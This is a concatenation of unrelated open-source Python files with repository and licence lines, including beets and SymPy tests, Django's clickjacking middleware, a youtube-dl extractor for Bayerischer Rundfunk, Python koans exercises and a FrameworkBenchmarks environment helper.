commands.pop(0)
module.exit_json(changed=changed,
pkg=pkg,
file_system=file_system,
updates=commands)
if __name__ == '__main__':
main()
| gpl-3.0 |
TathagataChakraborti/resource-conflicts | PLANROB-2015/seq-sat-lama/Python-2.5.2/Lib/plat-mac/lib-scriptpackages/SystemEvents/Hidden_Suite.py | 82 | 1253 | """Suite Hidden Suite: Hidden Terms and Events for controlling the System Events application
Level 1, version 1
Generated from /System/Library/CoreServices/System Events.app
AETE/AEUT resource version 1/0, language 0, script 0
"""
import aetools
import MacOS
_code = 'tpnm'
from StdSuites.Type_Names_Suite import *
class Hidden_Suite_Events(Type_Names_Suite_Events):
def do_script(self, _object, _attributes={}, **_arguments):
"""do script: Execute an OSA script.
Required argument: the object for the command
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'misc'
_subcode = 'dosc'
if _arguments: raise TypeError, 'No optional args expected'
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
#
# Indices of types declared in this module
#
_classdeclarations = {
}
_propdeclarations = {
}
_compdeclarations = {
}
_enumdeclarations = {
}
| mit |
untitaker/beets | test/test_importadded.py | 25 | 7186 | # This file is part of beets.
# Copyright 2015, Stig Inge Lea Bjornsen.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
"""Tests for the `importadded` plugin."""
import os
from test._common import unittest
from test.test_importer import ImportHelper, AutotagStub
from beets import importer
from beets import util
from beetsplug.importadded import ImportAddedPlugin
_listeners = ImportAddedPlugin.listeners
def preserve_plugin_listeners():
"""Preserve the initial plugin listeners as they would otherwise be
deleted after the first setup / tear down cycle.
"""
if not ImportAddedPlugin.listeners:
ImportAddedPlugin.listeners = _listeners
def modify_mtimes(paths, offset=-60000):
for i, path in enumerate(paths, start=1):
mstat = os.stat(path)
os.utime(path, (mstat.st_atime, mstat.st_mtime + offset * i))
class ImportAddedTest(unittest.TestCase, ImportHelper):
# The minimum mtime of the files to be imported
min_mtime = None
def setUp(self):
preserve_plugin_listeners()
self.setup_beets()
self.load_plugins('importadded')
self._create_import_dir(2)
# Different mtimes on the files to be imported in order to test the
# plugin
modify_mtimes((mfile.path for mfile in self.media_files))
self.min_mtime = min(os.path.getmtime(mfile.path)
for mfile in self.media_files)
self.matcher = AutotagStub().install()
self.matcher.macthin = AutotagStub.GOOD
self._setup_import_session()
self.importer.add_choice(importer.action.APPLY)
def tearDown(self):
self.unload_plugins()
self.teardown_beets()
self.matcher.restore()
def findMediaFile(self, item):
"""Find the pre-import MediaFile for an Item"""
for m in self.media_files:
if m.title.replace('Tag', 'Applied') == item.title:
return m
raise AssertionError("No MediaFile found for Item " +
util.displayable_path(item.path))
def assertEqualTimes(self, first, second, msg=None):
"""For comparing file modification times at a sufficient precision"""
self.assertAlmostEqual(first, second, places=4, msg=msg)
def assertAlbumImport(self):
self.importer.run()
album = self.lib.albums().get()
self.assertEqual(album.added, self.min_mtime)
for item in album.items():
self.assertEqual(item.added, self.min_mtime)
def test_import_album_with_added_dates(self):
self.assertAlbumImport()
def test_import_album_inplace_with_added_dates(self):
self.config['import']['copy'] = False
self.config['import']['move'] = False
self.config['import']['link'] = False
self.assertAlbumImport()
def test_import_album_with_preserved_mtimes(self):
self.config['importadded']['preserve_mtimes'] = True
self.importer.run()
album = self.lib.albums().get()
self.assertEqual(album.added, self.min_mtime)
for item in album.items():
self.assertEqualTimes(item.added, self.min_mtime)
mediafile_mtime = os.path.getmtime(self.findMediaFile(item).path)
self.assertEqualTimes(item.mtime, mediafile_mtime)
self.assertEqualTimes(os.path.getmtime(item.path),
mediafile_mtime)
def test_reimported_album_skipped(self):
# Import and record the original added dates
self.importer.run()
album = self.lib.albums().get()
album_added_before = album.added
items_added_before = dict((item.path, item.added)
for item in album.items())
# Newer Item path mtimes as if Beets had modified them
modify_mtimes(items_added_before.keys(), offset=10000)
# Reimport
self._setup_import_session(import_dir=album.path)
self.importer.run()
# Verify the reimported items
album = self.lib.albums().get()
self.assertEqualTimes(album.added, album_added_before)
items_added_after = dict((item.path, item.added)
for item in album.items())
for item_path, added_after in items_added_after.iteritems():
self.assertEqualTimes(items_added_before[item_path], added_after,
"reimport modified Item.added for " +
item_path)
def test_import_singletons_with_added_dates(self):
self.config['import']['singletons'] = True
self.importer.run()
for item in self.lib.items():
mfile = self.findMediaFile(item)
self.assertEqualTimes(item.added, os.path.getmtime(mfile.path))
def test_import_singletons_with_preserved_mtimes(self):
self.config['import']['singletons'] = True
self.config['importadded']['preserve_mtimes'] = True
self.importer.run()
for item in self.lib.items():
mediafile_mtime = os.path.getmtime(self.findMediaFile(item).path)
self.assertEqualTimes(item.added, mediafile_mtime)
self.assertEqualTimes(item.mtime, mediafile_mtime)
self.assertEqualTimes(os.path.getmtime(item.path),
mediafile_mtime)
def test_reimported_singletons_skipped(self):
self.config['import']['singletons'] = True
# Import and record the original added dates
self.importer.run()
items_added_before = dict((item.path, item.added)
for item in self.lib.items())
# Newer Item path mtimes as if Beets had modified them
modify_mtimes(items_added_before.keys(), offset=10000)
# Reimport
import_dir = os.path.dirname(items_added_before.keys()[0])
self._setup_import_session(import_dir=import_dir, singletons=True)
self.importer.run()
# Verify the reimported items
items_added_after = dict((item.path, item.added)
for item in self.lib.items())
for item_path, added_after in items_added_after.iteritems():
self.assertEqualTimes(items_added_before[item_path], added_after,
"reimport modified Item.added for " +
item_path)
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == b'__main__':
unittest.main(defaultTest='suite')
| mit |
antepsis/anteplahmacun | sympy/categories/tests/test_baseclasses.py | 98 | 5704 | from sympy.categories import (Object, Morphism, IdentityMorphism,
NamedMorphism, CompositeMorphism,
Diagram, Category)
from sympy.categories.baseclasses import Class
from sympy.utilities.pytest import raises
from sympy import FiniteSet, EmptySet, Dict, Tuple
def test_morphisms():
A = Object("A")
B = Object("B")
C = Object("C")
D = Object("D")
# Test the base morphism.
f = NamedMorphism(A, B, "f")
assert f.domain == A
assert f.codomain == B
assert f == NamedMorphism(A, B, "f")
# Test identities.
id_A = IdentityMorphism(A)
id_B = IdentityMorphism(B)
assert id_A.domain == A
assert id_A.codomain == A
assert id_A == IdentityMorphism(A)
assert id_A != id_B
# Test named morphisms.
g = NamedMorphism(B, C, "g")
assert g.name == "g"
assert g != f
assert g == NamedMorphism(B, C, "g")
assert g != NamedMorphism(B, C, "f")
# Test composite morphisms.
assert f == CompositeMorphism(f)
k = g.compose(f)
assert k.domain == A
assert k.codomain == C
assert k.components == Tuple(f, g)
assert g * f == k
assert CompositeMorphism(f, g) == k
assert CompositeMorphism(g * f) == g * f
# Test the associativity of composition.
h = NamedMorphism(C, D, "h")
p = h * g
u = h * g * f
assert h * k == u
assert p * f == u
assert CompositeMorphism(f, g, h) == u
# Test flattening.
u2 = u.flatten("u")
assert isinstance(u2, NamedMorphism)
assert u2.name == "u"
assert u2.domain == A
assert u2.codomain == D
# Test identities.
assert f * id_A == f
assert id_B * f == f
assert id_A * id_A == id_A
assert CompositeMorphism(id_A) == id_A
# Test bad compositions.
raises(ValueError, lambda: f * g)
raises(TypeError, lambda: f.compose(None))
raises(TypeError, lambda: id_A.compose(None))
raises(TypeError, lambda: f * None)
raises(TypeError, lambda: id_A * None)
raises(TypeError, lambda: CompositeMorphism(f, None, 1))
raises(ValueError, lambda: NamedMorphism(A, B, ""))
raises(NotImplementedError, lambda: Morphism(A, B))
def test_diagram():
A = Object("A")
B = Object("B")
C = Object("C")
f = NamedMorphism(A, B, "f")
g = NamedMorphism(B, C, "g")
id_A = IdentityMorphism(A)
id_B = IdentityMorphism(B)
empty = EmptySet()
# Test the addition of identities.
d1 = Diagram([f])
assert d1.objects == FiniteSet(A, B)
assert d1.hom(A, B) == (FiniteSet(f), empty)
assert d1.hom(A, A) == (FiniteSet(id_A), empty)
assert d1.hom(B, B) == (FiniteSet(id_B), empty)
assert d1 == Diagram([id_A, f])
assert d1 == Diagram([f, f])
# Test the addition of composites.
d2 = Diagram([f, g])
homAC = d2.hom(A, C)[0]
assert d2.objects == FiniteSet(A, B, C)
assert g * f in d2.premises.keys()
assert homAC == FiniteSet(g * f)
# Test equality, inequality and hash.
d11 = Diagram([f])
assert d1 == d11
assert d1 != d2
assert hash(d1) == hash(d11)
d11 = Diagram({f: "unique"})
assert d1 != d11
# Make sure that (re-)adding composites (with new properties)
# works as expected.
d = Diagram([f, g], {g * f: "unique"})
assert d.conclusions == Dict({g * f: FiniteSet("unique")})
# Check the hom-sets when there are premises and conclusions.
assert d.hom(A, C) == (FiniteSet(g * f), FiniteSet(g * f))
d = Diagram([f, g], [g * f])
assert d.hom(A, C) == (FiniteSet(g * f), FiniteSet(g * f))
# Check how the properties of composite morphisms are computed.
d = Diagram({f: ["unique", "isomorphism"], g: "unique"})
assert d.premises[g * f] == FiniteSet("unique")
# Check that conclusion morphisms with new objects are not allowed.
d = Diagram([f], [g])
assert d.conclusions == Dict({})
# Test an empty diagram.
d = Diagram()
assert d.premises == Dict({})
assert d.conclusions == Dict({})
assert d.objects == empty
# Check a SymPy Dict object.
d = Diagram(Dict({f: FiniteSet("unique", "isomorphism"), g: "unique"}))
assert d.premises[g * f] == FiniteSet("unique")
# Check the addition of components of composite morphisms.
d = Diagram([g * f])
assert f in d.premises
assert g in d.premises
# Check subdiagrams.
d = Diagram([f, g], {g * f: "unique"})
d1 = Diagram([f])
assert d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d = Diagram([NamedMorphism(B, A, "f'")])
assert not d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d1 = Diagram([f, g], {g * f: ["unique", "something"]})
assert not d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d = Diagram({f: "blooh"})
d1 = Diagram({f: "bleeh"})
assert not d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d = Diagram([f, g], {f: "unique", g * f: "veryunique"})
d1 = d.subdiagram_from_objects(FiniteSet(A, B))
assert d1 == Diagram([f], {f: "unique"})
raises(ValueError, lambda: d.subdiagram_from_objects(FiniteSet(A,
Object("D"))))
raises(ValueError, lambda: Diagram({IdentityMorphism(A): "unique"}))
def test_category():
A = Object("A")
B = Object("B")
C = Object("C")
f = NamedMorphism(A, B, "f")
g = NamedMorphism(B, C, "g")
d1 = Diagram([f, g])
d2 = Diagram([f])
objects = d1.objects | d2.objects
K = Category("K", objects, commutative_diagrams=[d1, d2])
assert K.name == "K"
assert K.objects == Class(objects)
assert K.commutative_diagrams == FiniteSet(d1, d2)
raises(ValueError, lambda: Category(""))
| bsd-3-clause |
katrid/django | django/middleware/clickjacking.py | 87 | 1988 | """
Clickjacking Protection Middleware.
This module provides a middleware that implements protection against a
malicious site loading resources from your site in a hidden frame.
"""
from django.conf import settings
class XFrameOptionsMiddleware(object):
"""
Middleware that sets the X-Frame-Options HTTP header in HTTP responses.
Does not set the header if it's already set or if the response contains
a xframe_options_exempt value set to True.
By default, sets the X-Frame-Options header to 'SAMEORIGIN', meaning the
response can only be loaded on a frame within the same site. To prevent the
response from being loaded in a frame in any site, set X_FRAME_OPTIONS in
your project's Django settings to 'DENY'.
Note: older browsers will quietly ignore this header, thus other
clickjacking protection techniques should be used if protection in those
browsers is required.
http://en.wikipedia.org/wiki/Clickjacking#Server_and_client
"""
def process_response(self, request, response):
# Don't set it if it's already in the response
if response.get('X-Frame-Options') is not None:
return response
# Don't set it if they used @xframe_options_exempt
if getattr(response, 'xframe_options_exempt', False):
return response
response['X-Frame-Options'] = self.get_xframe_options_value(request,
response)
return response
def get_xframe_options_value(self, request, response):
"""
Gets the value to set for the X_FRAME_OPTIONS header.
By default this uses the value from the X_FRAME_OPTIONS Django
settings. If not found in settings, defaults to 'SAMEORIGIN'.
This method can be overridden if needed, allowing it to vary based on
the request or response.
"""
return getattr(settings, 'X_FRAME_OPTIONS', 'SAMEORIGIN').upper()
| bsd-3-clause |
rafiqsaleh/VERCE | verce-hpc-pe/src/networkx/generators/tests/test_geometric.py | 88 | 1036 | #!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestGeneratorsGeometric():
def test_random_geometric_graph(self):
G=nx.random_geometric_graph(50,0.25)
assert_equal(len(G),50)
def test_geographical_threshold_graph(self):
G=nx.geographical_threshold_graph(50,100)
assert_equal(len(G),50)
def test_waxman_graph(self):
G=nx.waxman_graph(50,0.5,0.1)
assert_equal(len(G),50)
G=nx.waxman_graph(50,0.5,0.1,L=1)
assert_equal(len(G),50)
def test_naviable_small_world(self):
G = nx.navigable_small_world_graph(5,p=1,q=0)
gg = nx.grid_2d_graph(5,5).to_directed()
assert_true(nx.is_isomorphic(G,gg))
G = nx.navigable_small_world_graph(5,p=1,q=0,dim=3)
gg = nx.grid_graph([5,5,5]).to_directed()
assert_true(nx.is_isomorphic(G,gg))
G = nx.navigable_small_world_graph(5,p=1,q=0,dim=1)
gg = nx.grid_graph([5]).to_directed()
assert_true(nx.is_isomorphic(G,gg))
| mit |
remitamine/youtube-dl | youtube_dl/extractor/br.py | 30 | 11903 | # coding: utf-8
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
ExtractorError,
int_or_none,
parse_duration,
parse_iso8601,
xpath_element,
xpath_text,
)
class BRIE(InfoExtractor):
IE_DESC = 'Bayerischer Rundfunk'
_VALID_URL = r'(?P<base_url>https?://(?:www\.)?br(?:-klassik)?\.de)/(?:[a-z0-9\-_]+/)+(?P<id>[a-z0-9\-_]+)\.html'
_TESTS = [
{
'url': 'http://www.br.de/mediathek/video/sendungen/abendschau/betriebliche-altersvorsorge-104.html',
'md5': '83a0477cf0b8451027eb566d88b51106',
'info_dict': {
'id': '48f656ef-287e-486f-be86-459122db22cc',
'ext': 'mp4',
'title': 'Die böse Überraschung',
'description': 'md5:ce9ac81b466ce775b8018f6801b48ac9',
'duration': 180,
'uploader': 'Reinhard Weber',
'upload_date': '20150422',
},
'skip': '404 not found',
},
{
'url': 'http://www.br.de/nachrichten/oberbayern/inhalt/muenchner-polizeipraesident-schreiber-gestorben-100.html',
'md5': 'af3a3a4aa43ff0ce6a89504c67f427ef',
'info_dict': {
'id': 'a4b83e34-123d-4b81-9f4e-c0d3121a4e05',
'ext': 'flv',
'title': 'Manfred Schreiber ist tot',
'description': 'md5:b454d867f2a9fc524ebe88c3f5092d97',
'duration': 26,
},
'skip': '404 not found',
},
{
'url': 'https://www.br-klassik.de/audio/peeping-tom-premierenkritik-dance-festival-muenchen-100.html',
'md5': '8b5b27c0b090f3b35eac4ab3f7a73d3d',
'info_dict': {
'id': '74c603c9-26d3-48bb-b85b-079aeed66e0b',
'ext': 'aac',
'title': 'Kurzweilig und sehr bewegend',
'description': 'md5:0351996e3283d64adeb38ede91fac54e',
'duration': 296,
},
'skip': '404 not found',
},
{
'url': 'http://www.br.de/radio/bayern1/service/team/videos/team-video-erdelt100.html',
'md5': 'dbab0aef2e047060ea7a21fc1ce1078a',
'info_dict': {
'id': '6ba73750-d405-45d3-861d-1ce8c524e059',
'ext': 'mp4',
'title': 'Umweltbewusster Häuslebauer',
'description': 'md5:d52dae9792d00226348c1dbb13c9bae2',
'duration': 116,
}
},
{
'url': 'http://www.br.de/fernsehen/br-alpha/sendungen/kant-fuer-anfaenger/kritik-der-reinen-vernunft/kant-kritik-01-metaphysik100.html',
'md5': '23bca295f1650d698f94fc570977dae3',
'info_dict': {
'id': 'd982c9ce-8648-4753-b358-98abb8aec43d',
'ext': 'mp4',
'title': 'Folge 1 - Metaphysik',
'description': 'md5:bb659990e9e59905c3d41e369db1fbe3',
'duration': 893,
'uploader': 'Eva Maria Steimle',
'upload_date': '20170208',
}
},
]
def _real_extract(self, url):
base_url, display_id = re.search(self._VALID_URL, url).groups()
page = self._download_webpage(url, display_id)
xml_url = self._search_regex(
r"return BRavFramework\.register\(BRavFramework\('avPlayer_(?:[a-f0-9-]{36})'\)\.setup\({dataURL:'(/(?:[a-z0-9\-]+/)+[a-z0-9/~_.-]+)'}\)\);", page, 'XMLURL')
xml = self._download_xml(base_url + xml_url, display_id)
medias = []
for xml_media in xml.findall('video') + xml.findall('audio'):
media_id = xml_media.get('externalId')
media = {
'id': media_id,
'title': xpath_text(xml_media, 'title', 'title', True),
'duration': parse_duration(xpath_text(xml_media, 'duration')),
'formats': self._extract_formats(xpath_element(
xml_media, 'assets'), media_id),
'thumbnails': self._extract_thumbnails(xpath_element(
xml_media, 'teaserImage/variants'), base_url),
'description': xpath_text(xml_media, 'desc'),
'webpage_url': xpath_text(xml_media, 'permalink'),
'uploader': xpath_text(xml_media, 'author'),
}
broadcast_date = xpath_text(xml_media, 'broadcastDate')
if broadcast_date:
media['upload_date'] = ''.join(reversed(broadcast_date.split('.')))
medias.append(media)
if len(medias) > 1:
self._downloader.report_warning(
'found multiple medias; please '
'report this with the video URL to http://yt-dl.org/bug')
if not medias:
raise ExtractorError('No media entries found')
return medias[0]
def _extract_formats(self, assets, media_id):
formats = []
for asset in assets.findall('asset'):
format_url = xpath_text(asset, ['downloadUrl', 'url'])
asset_type = asset.get('type')
if asset_type.startswith('HDS'):
formats.extend(self._extract_f4m_formats(
format_url + '?hdcore=3.2.0', media_id, f4m_id='hds', fatal=False))
elif asset_type.startswith('HLS'):
formats.extend(self._extract_m3u8_formats(
format_url, media_id, 'mp4', 'm3u8_native', m3u8_id='hds', fatal=False))
else:
format_info = {
'ext': xpath_text(asset, 'mediaType'),
'width': int_or_none(xpath_text(asset, 'frameWidth')),
'height': int_or_none(xpath_text(asset, 'frameHeight')),
'tbr': int_or_none(xpath_text(asset, 'bitrateVideo')),
'abr': int_or_none(xpath_text(asset, 'bitrateAudio')),
'vcodec': xpath_text(asset, 'codecVideo'),
'acodec': xpath_text(asset, 'codecAudio'),
'container': xpath_text(asset, 'mediaType'),
'filesize': int_or_none(xpath_text(asset, 'size')),
}
format_url = self._proto_relative_url(format_url)
if format_url:
http_format_info = format_info.copy()
http_format_info.update({
'url': format_url,
'format_id': 'http-%s' % asset_type,
})
formats.append(http_format_info)
server_prefix = xpath_text(asset, 'serverPrefix')
if server_prefix:
rtmp_format_info = format_info.copy()
rtmp_format_info.update({
'url': server_prefix,
'play_path': xpath_text(asset, 'fileName'),
'format_id': 'rtmp-%s' % asset_type,
})
formats.append(rtmp_format_info)
self._sort_formats(formats)
return formats
def _extract_thumbnails(self, variants, base_url):
thumbnails = [{
'url': base_url + xpath_text(variant, 'url'),
'width': int_or_none(xpath_text(variant, 'width')),
'height': int_or_none(xpath_text(variant, 'height')),
} for variant in variants.findall('variant') if xpath_text(variant, 'url')]
thumbnails.sort(key=lambda x: x['width'] * x['height'], reverse=True)
return thumbnails
class BRMediathekIE(InfoExtractor):
IE_DESC = 'Bayerischer Rundfunk Mediathek'
_VALID_URL = r'https?://(?:www\.)?br\.de/mediathek/video/[^/?&#]*?-(?P<id>av:[0-9a-f]{24})'
_TESTS = [{
'url': 'https://www.br.de/mediathek/video/gesundheit-die-sendung-vom-28112017-av:5a1e6a6e8fce6d001871cc8e',
'md5': 'fdc3d485835966d1622587d08ba632ec',
'info_dict': {
'id': 'av:5a1e6a6e8fce6d001871cc8e',
'ext': 'mp4',
'title': 'Die Sendung vom 28.11.2017',
'description': 'md5:6000cdca5912ab2277e5b7339f201ccc',
'timestamp': 1511942766,
'upload_date': '20171129',
}
}]
def _real_extract(self, url):
clip_id = self._match_id(url)
clip = self._download_json(
'https://proxy-base.master.mango.express/graphql',
clip_id, data=json.dumps({
"query": """{
viewer {
clip(id: "%s") {
title
description
duration
createdAt
ageRestriction
videoFiles {
edges {
node {
publicLocation
fileSize
videoProfile {
width
height
bitrate
encoding
}
}
}
}
captionFiles {
edges {
node {
publicLocation
}
}
}
teaserImages {
edges {
node {
imageFiles {
edges {
node {
publicLocation
width
height
}
}
}
}
}
}
}
}
}""" % clip_id}).encode(), headers={
'Content-Type': 'application/json',
})['data']['viewer']['clip']
title = clip['title']
formats = []
for edge in clip.get('videoFiles', {}).get('edges', []):
node = edge.get('node', {})
n_url = node.get('publicLocation')
if not n_url:
continue
ext = determine_ext(n_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
n_url, clip_id, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
else:
video_profile = node.get('videoProfile', {})
tbr = int_or_none(video_profile.get('bitrate'))
format_id = 'http'
if tbr:
format_id += '-%d' % tbr
formats.append({
'format_id': format_id,
'url': n_url,
'width': int_or_none(video_profile.get('width')),
'height': int_or_none(video_profile.get('height')),
'tbr': tbr,
'filesize': int_or_none(node.get('fileSize')),
})
self._sort_formats(formats)
subtitles = {}
for edge in clip.get('captionFiles', {}).get('edges', []):
node = edge.get('node', {})
n_url = node.get('publicLocation')
if not n_url:
continue
subtitles.setdefault('de', []).append({
'url': n_url,
})
thumbnails = []
for edge in clip.get('teaserImages', {}).get('edges', []):
for image_edge in edge.get('node', {}).get('imageFiles', {}).get('edges', []):
node = image_edge.get('node', {})
n_url = node.get('publicLocation')
if not n_url:
continue
thumbnails.append({
'url': n_url,
'width': int_or_none(node.get('width')),
'height': int_or_none(node.get('height')),
})
return {
'id': clip_id,
'title': title,
'description': clip.get('description'),
'duration': int_or_none(clip.get('duration')),
'timestamp': parse_iso8601(clip.get('createdAt')),
'age_limit': int_or_none(clip.get('ageRestriction')),
'formats': formats,
'subtitles': subtitles,
'thumbnails': thumbnails,
}
| unlicense |
apradhn/python_koans | python3/koans/about_classes.py | 68 | 4778 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutClasses(Koan):
class Dog:
"Dogs need regular walkies. Never, ever let them drive."
def test_instances_of_classes_can_be_created_adding_parentheses(self):
# NOTE: The .__name__ attribute will convert the class
# into a string value.
fido = self.Dog()
self.assertEqual(__, fido.__class__.__name__)
def test_classes_have_docstrings(self):
self.assertRegexpMatches(self.Dog.__doc__, __)
# ------------------------------------------------------------------
class Dog2:
def __init__(self):
self._name = 'Paul'
def set_name(self, a_name):
self._name = a_name
def test_init_method_is_the_constructor(self):
dog = self.Dog2()
self.assertEqual(__, dog._name)
def test_private_attributes_are_not_really_private(self):
dog = self.Dog2()
dog.set_name("Fido")
self.assertEqual(__, dog._name)
# The _ prefix in _name implies private ownership, but nothing is truly
# private in Python.
def test_you_can_also_access_the_value_out_using_getattr_and_dict(self):
fido = self.Dog2()
fido.set_name("Fido")
self.assertEqual(__, getattr(fido, "_name"))
# getattr(), setattr() and delattr() are a way of accessing attributes
# by method rather than through assignment operators
self.assertEqual(__, fido.__dict__["_name"])
# Yes, this works here, but don't rely on the __dict__ object! Some
# class implementations use optimization which result in __dict__ not
# showing everything.
# ------------------------------------------------------------------
class Dog3:
def __init__(self):
self._name = None
def set_name(self, a_name):
self._name = a_name
def get_name(self):
return self._name
name = property(get_name, set_name)
def test_that_name_can_be_read_as_a_property(self):
fido = self.Dog3()
fido.set_name("Fido")
# access as method
self.assertEqual(__, fido.get_name())
# access as property
self.assertEqual(__, fido.name)
# ------------------------------------------------------------------
class Dog4:
def __init__(self):
self._name = None
@property
def name(self):
return self._name
@name.setter
def name(self, a_name):
self._name = a_name
def test_creating_properties_with_decorators_is_slightly_easier(self):
fido = self.Dog4()
fido.name = "Fido"
self.assertEqual(__, fido.name)
# ------------------------------------------------------------------
class Dog5:
def __init__(self, initial_name):
self._name = initial_name
@property
def name(self):
return self._name
def test_init_provides_initial_values_for_instance_variables(self):
fido = self.Dog5("Fido")
self.assertEqual(__, fido.name)
def test_args_must_match_init(self):
with self.assertRaises(___):
self.Dog5()
# THINK ABOUT IT:
# Why is this so?
def test_different_objects_have_different_instance_variables(self):
fido = self.Dog5("Fido")
rover = self.Dog5("Rover")
self.assertEqual(__, rover.name == fido.name)
# ------------------------------------------------------------------
class Dog6:
def __init__(self, initial_name):
self._name = initial_name
def get_self(self):
return self
def __str__(self):
#
# Implement this!
#
return __
def __repr__(self):
return "<Dog named '" + self._name + "'>"
def test_inside_a_method_self_refers_to_the_containing_object(self):
fido = self.Dog6("Fido")
self.assertEqual(__, fido.get_self()) # Not a string!
def test_str_provides_a_string_version_of_the_object(self):
fido = self.Dog6("Fido")
self.assertEqual("Fido", str(fido))
def test_str_is_used_explicitly_in_string_interpolation(self):
fido = self.Dog6("Fido")
self.assertEqual(__, "My dog is " + str(fido))
def test_repr_provides_a_more_complete_string_version(self):
fido = self.Dog6("Fido")
self.assertEqual(__, repr(fido))
def test_all_objects_support_str_and_repr(self):
seq = [1, 2, 3]
self.assertEqual(__, str(seq))
self.assertEqual(__, repr(seq))
self.assertEqual(__, str("STRING"))
self.assertEqual(__, repr("STRING"))
| mit |
kostya-sh/FrameworkBenchmarks | toolset/setup/linux/setup_util.py | 40 | 5611 | import re
import os
import sys
import subprocess
import platform
from threading import Thread
from Queue import Queue, Empty
class NonBlockingStreamReader:
'''
Enables calling readline in a non-blocking manner with a blocking stream,
such as the ones returned from subprocess.Popen
Originally written by Eyal Arubas, who granted permission to use this inside TFB
See http://eyalarubas.com/python-subproc-nonblock.html
'''
def __init__(self, stream, eof_message = None):
'''
stream: the stream to read from.
Usually a process' stdout or stderr.
eof_message: A message to print to stdout as soon
as the stream's end is reached. Useful if you
want to track the exact moment a stream terminates
'''
self._s = stream
self._q = Queue()
self._eof_message = eof_message
self._poisonpill = 'MAGIC_POISONPILL_STRING'
def _populateQueue(stream, queue):
while True:
line = stream.readline()
if line: # 'data\n' or '\n'
queue.put(line)
else: # '' e.g. EOF
if self._eof_message:
sys.stdout.write(self._eof_message + '\n')
queue.put(self._poisonpill)
return
self._t = Thread(target = _populateQueue,
args = (self._s, self._q))
self._t.daemon = True
self._t.start()
def readline(self, timeout = None):
try:
line = self._q.get(block = timeout is not None,
timeout = timeout)
if line == self._poisonpill:
raise EndOfStream
return line
except Empty:
return None
class EndOfStream(Exception): pass
# Replaces all text found using the regular expression to_replace with the supplied replacement.
def replace_text(file, to_replace, replacement):
with open(file, "r") as conf:
contents = conf.read()
replaced_text = re.sub(to_replace, replacement, contents)
with open(file, "w") as f:
f.write(replaced_text)
# Replaces the current process environment with the one found in
# config file. Retains a few original vars (HOME,PATH, etc) by default.
# Optionally allows specification of a command to be run before loading
# the environment, to allow the framework to set environment variables
# Note: This command *cannot* print to stdout!
#
# Note: This will not replace the sudo environment (e.g. subprocess.check_call("sudo <command>")).
# If you must use sudo, consider sudo sh -c ". <config> && your_command"
def replace_environ(config=None, root=None, print_result=False, command='true'):
if platform.system().lower() == 'windows':
pass
else:
# Clean up our current environment, preserving some important items
mini_environ = {}
for envname in ['HOME', 'PATH', 'LANG', 'USER', 'LD_LIBRARY_PATH', 'PYTHONPATH', 'FWROOT', 'TRAVIS']:
if envname in os.environ:
mini_environ[envname] = os.environ[envname]
for key in os.environ:
if key.startswith(('TFB_', 'TRAVIS_')): # Any TFB_* and TRAVIS_* variables are preserved
mini_environ[key] = os.environ[key]
os.environ.clear()
# Use FWROOT if explicitely provided
if root is not None:
mini_environ['FWROOT']=root
# Run command, source config file, and store resulting environment
setup_env = "%s && . %s && env" % (command, config)
env = ""
try:
env = subprocess.check_output(setup_env, shell=True, env=mini_environ,
executable='/bin/bash')
except subprocess.CalledProcessError:
# Ensure that an error here does not crash the toolset
print "CRITICAL: Loading %s returned non-zero exit" % config
for key,value in mini_environ.iteritems():
os.environ[key]=value
return
for line in env.split('\n'):
try:
key, value = line.split('=', 1)
# If we already have this TFB_ variable, do not overwrite
if key.startswith('TFB_') and key in mini_environ:
os.environ[key]=mini_environ[key]
else:
os.environ[key]=value
except Exception:
if not line: # Don't warn for empty line
continue
print "WARN: Line '%s' from '%s' is not an environment variable" % (line, config)
continue
if print_result:
out = subprocess.check_output('env', shell=True, executable='/bin/bash')
print "Environment after loading %s" %config
print out
# Queries the shell for the value of FWROOT
def get_fwroot():
if platform.system().lower() == 'windows':
fwroot = "C:\FrameworkBenchmarks"
return fwroot
else:
try:
# Use printf to avoid getting a newline
# Redirect to avoid stderr printing
fwroot = subprocess.check_output('printf $FWROOT 2> /dev/null', shell=True, executable='/bin/bash')
return fwroot
except subprocess.CalledProcessError:
# Make a last-guess effort ;-)
return os.getcwd();
# Turns absolute path into path relative to FWROOT
# Assumes path is underneath FWROOT, not above
#
# Useful for clean presentation of paths
# e.g. /foo/bar/benchmarks/go/install.sh
# v.s. FWROOT/go/install.sh
def path_relative_to_root(path):
# Requires bash shell parameter expansion
return subprocess.check_output("D=%s && printf \"${D#%s}\""%(path, get_fwroot()), shell=True, executable='/bin/bash')
| bsd-3-clause |
madan96/sympy | sympy/solvers/pde.py | 13 | 35505 | """
This module contains pdsolve() and different helper functions that it
uses. It is heavily inspired by the ode module and hence the basic
infrastructure remains the same.
**Functions in this module**
These are the user functions in this module:
- pdsolve() - Solves PDE's
- classify_pde() - Classifies PDEs into possible hints for dsolve().
- pde_separate() - Separate variables in partial differential equation either by
additive or multiplicative separation approach.
These are the helper functions in this module:
- pde_separate_add() - Helper function for searching additive separable solutions.
- pde_separate_mul() - Helper function for searching multiplicative
separable solutions.
**Currently implemented solver methods**
The following methods are implemented for solving partial differential
equations. See the docstrings of the various pde_hint() functions for
more information on each (run help(pde)):
- 1st order linear homogeneous partial differential equations
with constant coefficients.
- 1st order linear general partial differential equations
